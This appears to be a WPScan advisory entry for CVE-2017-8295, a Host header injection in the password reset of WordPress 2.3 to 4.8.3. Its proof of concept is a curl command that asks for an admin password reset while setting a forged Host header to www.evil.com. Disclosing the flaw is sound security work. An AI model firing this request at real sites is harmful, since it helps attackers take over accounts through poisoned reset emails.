WordPress 2.3-4.8.3 - Host Header Injection in Password Reset



Description
Attacker may be able to set the 'From' email header in password reset emails.
Proof of Concept
curl -H "Host: www.evil.com" --data "user_login=admin&redirect_to=&wp-submit=Get+New+Password" http://example.com/wp-login.php?action=lostpassword

Affects WordPresses

References

CVE 2017-8295
URL https://core.trac.wordpress.org/ticket/25239
URL https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
URL http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html

Classification

Type UNKNOWN

Miscellaneous

Submitter ethicalhack3r
Submitter Website https://dewhurstsecurity.com/
Submitter Twitter dewhurstsec
Views 979
Verified No
WPVDB ID 8807

Timeline

Publicly Published 2017-05-03 (over 1 year ago)
Added 2017-05-05 (over 1 year ago)
Last Updated 2018-08-29 (23 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.